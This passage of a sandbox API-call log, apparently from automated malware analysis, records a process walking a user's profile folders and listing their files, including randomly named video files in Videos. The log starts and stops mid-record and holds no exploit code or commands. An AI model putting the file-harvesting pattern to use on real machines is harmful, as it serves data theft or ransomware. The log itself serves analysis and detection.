ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0180.760] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0180.760] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.760] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.760] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Searches\\") returned="Searches\\" [0180.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.761] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.761] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.761] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.761] PathFindFileNameW (pszPath="") returned="" [0180.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.761] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Searches\\*" (normalized: "c:\\users\\keecfmwgj\\searches\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e82f090, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.761] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e82f090, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.761] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8317a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0180.761] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0180.761] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0180.761] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0180.761] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.761] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.762] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\SendTo\\") returned="SendTo\\" [0180.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.762] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.762] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.762] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.762] PathFindFileNameW (pszPath="") returned="" [0180.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.762] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\SendTo\\*" (normalized: "c:\\users\\keecfmwgj\\sendto\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0180.762] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.762] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Start Menu\\") returned="Start Menu\\" [0180.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.763] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.763] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.763] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.763] PathFindFileNameW (pszPath="") returned="" [0180.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.763] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Start Menu\\*" (normalized: "c:\\users\\keecfmwgj\\start menu\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0180.763] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.763] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Templates\\") returned="Templates\\" [0180.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.763] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.763] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.764] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.764] PathFindFileNameW (pszPath="") returned="" [0180.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.764] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Templates\\*" (normalized: "c:\\users\\keecfmwgj\\templates\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0180.764] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.764] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0180.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.764] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.764] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.764] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.764] PathFindFileNameW (pszPath="") returned="" [0180.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.765] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794831d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9ac462f0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9ac462f0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.765] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794831d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9ac462f0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9ac462f0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.765] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54142320, ftCreationTime.dwHighDateTime=0x1d8986e, ftLastAccessTime.dwLowDateTime=0x5a499430, ftLastAccessTime.dwHighDateTime=0x1d89e0b, ftLastWriteTime.dwLowDateTime=0x5a499430, ftLastWriteTime.dwHighDateTime=0x1d89e0b, nFileSizeHigh=0x0, nFileSizeLow=0x15f1b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="07H2voZRMEM4mGd_N.swf", cAlternateFileName="07H2VO~1.SWF")) returned 1 [0180.765] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa959890, ftCreationTime.dwHighDateTime=0x1d89752, ftLastAccessTime.dwLowDateTime=0x54e84250, ftLastAccessTime.dwHighDateTime=0x1d8a08d, ftLastWriteTime.dwLowDateTime=0x54e84250, ftLastWriteTime.dwHighDateTime=0x1d8a08d, nFileSizeHigh=0x0, nFileSizeLow=0x15bf3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9hkv.mp4", cAlternateFileName="")) returned 1 [0180.765] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe138b9c0, ftCreationTime.dwHighDateTime=0x1d89a97, ftLastAccessTime.dwLowDateTime=0xd50a4720, ftLastAccessTime.dwHighDateTime=0x1d89e81, ftLastWriteTime.dwLowDateTime=0xd50a4720, ftLastWriteTime.dwHighDateTime=0x1d89e81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cvfGVyFL7tFjUO7", cAlternateFileName="CVFGVY~1")) returned 1 [0180.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ec70 [0180.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eb38 [0180.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eee0 [0180.765] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798ad850, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798ad850, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7e35a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0180.765] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917ad4b0, ftCreationTime.dwHighDateTime=0x1d89d6a, ftLastAccessTime.dwLowDateTime=0x1967e630, ftLastAccessTime.dwHighDateTime=0x1d8a453, ftLastWriteTime.dwLowDateTime=0x1967e630, ftLastWriteTime.dwHighDateTime=0x1d8a453, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FPzctgqI5yS", cAlternateFileName="FPZCTG~1")) returned 1 [0180.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a404d0 [0180.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40688 [0180.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40630 [0180.765] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcea0700, ftCreationTime.dwHighDateTime=0x1d89b0f, ftLastAccessTime.dwLowDateTime=0x2512ef00, ftLastAccessTime.dwHighDateTime=0x1d8a0cc, ftLastWriteTime.dwLowDateTime=0x2512ef00, ftLastWriteTime.dwHighDateTime=0x1d8a0cc, nFileSizeHigh=0x0, nFileSizeLow=0x3eca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hA6nEQ04cdHym7b8.flv", cAlternateFileName="HA6NEQ~1.FLV")) returned 1 [0180.765] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dd89160, ftCreationTime.dwHighDateTime=0x1d89efc, ftLastAccessTime.dwLowDateTime=0xb679a6c0, ftLastAccessTime.dwHighDateTime=0x1d89fc1, ftLastWriteTime.dwLowDateTime=0xb679a6c0, ftLastWriteTime.dwHighDateTime=0x1d89fc1, nFileSizeHigh=0x0, nFileSizeLow=0x10f39, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iqB1Fd.mkv", cAlternateFileName="")) returned 1 [0180.765] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab69e4d0, ftCreationTime.dwHighDateTime=0x1d89e6c, ftLastAccessTime.dwLowDateTime=0x763b1c50, ftLastAccessTime.dwHighDateTime=0x1d8a184, ftLastWriteTime.dwLowDateTime=0x763b1c50, ftLastWriteTime.dwHighDateTime=0x1d8a184, nFileSizeHigh=0x0, nFileSizeLow=0x5f92, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="onXJrQ0LQmJjW.avi", cAlternateFileName="ONXJRQ~1.AVI")) returned 1 [0180.765] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x523f7f0, ftCreationTime.dwHighDateTime=0x1d89f6b, ftLastAccessTime.dwLowDateTime=0xddfb6750, ftLastAccessTime.dwHighDateTime=0x1d8a3d2, ftLastWriteTime.dwLowDateTime=0xddfb6750, ftLastWriteTime.dwHighDateTime=0x1d8a3d2, nFileSizeHigh=0x0, nFileSizeLow=0x12367, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P0jIQb7.avi", cAlternateFileName="")) returned 1 [0180.766] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb868c8a0, ftCreationTime.dwHighDateTime=0x1d8a40b, ftLastAccessTime.dwLowDateTime=0xdb6835e0, ftLastAccessTime.dwHighDateTime=0x1d8a6de, ftLastWriteTime.dwLowDateTime=0xdb6835e0, ftLastWriteTime.dwHighDateTime=0x1d8a6de, nFileSizeHigh=0x0, nFileSizeLow=0xcef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x7DOA nu7EAlTL.mkv", cAlternateFileName="X7DOAN~1.MKV")) returned 1 [0180.766] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361b25e0, ftCreationTime.dwHighDateTime=0x1d8a3d5, ftLastAccessTime.dwLowDateTime=0xf9918970, ftLastAccessTime.dwHighDateTime=0x1d8a6d1, ftLastWriteTime.dwLowDateTime=0xf9918970, ftLastWriteTime.dwHighDateTime=0x1d8a6d1, nFileSizeHigh=0x0, nFileSizeLow=0xed04, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z X z-1ADfCAZUF.mkv", cAlternateFileName="ZXZ-1A~1.MKV")) returned 1 [0180.766] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361b25e0, ftCreationTime.dwHighDateTime=0x1d8a3d5, ftLastAccessTime.dwLowDateTime=0xf9918970, ftLastAccessTime.dwHighDateTime=0x1d8a6d1, ftLastWriteTime.dwLowDateTime=0xf9918970, ftLastWriteTime.dwHighDateTime=0x1d8a6d1, nFileSizeHigh=0x0, nFileSizeLow=0xed04, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z X z-1ADfCAZUF.mkv", cAlternateFileName="ZXZ-1A~1.MKV")) returned 0 [0180.766] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.766] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0180.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.766] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0180.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.766] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0180.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0180.766] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0180.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.766] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.767] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.767] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.767] PathFindFileNameW (pszPath="") returned="" [0180.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0180.767] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.767] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.767] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0180.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ec70 [0180.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eb38 [0180.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ec8 [0180.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ef48 [0180.767] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0180.767] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.768] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0180.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.768] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 